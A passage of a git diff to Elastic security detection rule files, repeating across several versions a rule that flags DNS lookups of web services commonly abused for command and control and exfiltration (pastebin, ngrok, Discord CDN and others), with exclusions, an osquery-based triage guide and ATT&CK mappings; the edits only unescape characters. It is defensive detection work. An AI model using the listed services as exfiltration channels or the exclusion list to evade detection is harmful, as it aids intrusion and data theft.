\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\"\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint */\n (process.name : \"Microsoft.SharePoint.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : \"onedrive.live.com\"\n ) or \n\n /* Firefox */\n (process.name : \"firefox.exe\" and (process.code_signature.subject_name : \"Mozilla Corporation\" and\n process.code_signature.trusted == true)\n )\n ) \n", "related_integrations": [ { @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_106.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_106.json index 6b400fc81db..02ca639479b 100644 --- a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_106.json +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_106.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Connection to Commonly Abused Web Services", - "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"script.google.com\",\n \"script.googleusercontent.com\"\n ) and\n /* Insert noisy false positives here */\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n 
\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\"\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint */\n (process.name : \"Microsoft.SharePoint.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : \"onedrive.live.com\"\n ) or \n\n /* Firefox */\n (process.name : \"firefox.exe\" and (process.code_signature.subject_name : \"Mozilla Corporation\" and\n process.code_signature.trusted == true)\n )\n ) \n", "related_integrations": [ { @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_107.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_107.json index 966c1e487e1..eb2b322baa0 100644 --- a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_107.json +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_107.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Connection to Commonly Abused Web Services", - "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"script.google.com\",\n \"script.googleusercontent.com\"\n ) and\n /* Insert noisy false positives here */\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n 
\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\"\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint */\n (process.name : \"Microsoft.SharePoint.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : \"onedrive.live.com\"\n ) or \n\n /* Firefox */\n (process.name : \"firefox.exe\" and (process.code_signature.subject_name : \"Mozilla Corporation\" and\n process.code_signature.trusted == true)\n )\n ) \n", "related_integrations": [ { @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_108.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_108.json index 9f25a808cec..e330d106c90 100644 --- a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_108.json +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_108.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Connection to Commonly Abused Web Services", - "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
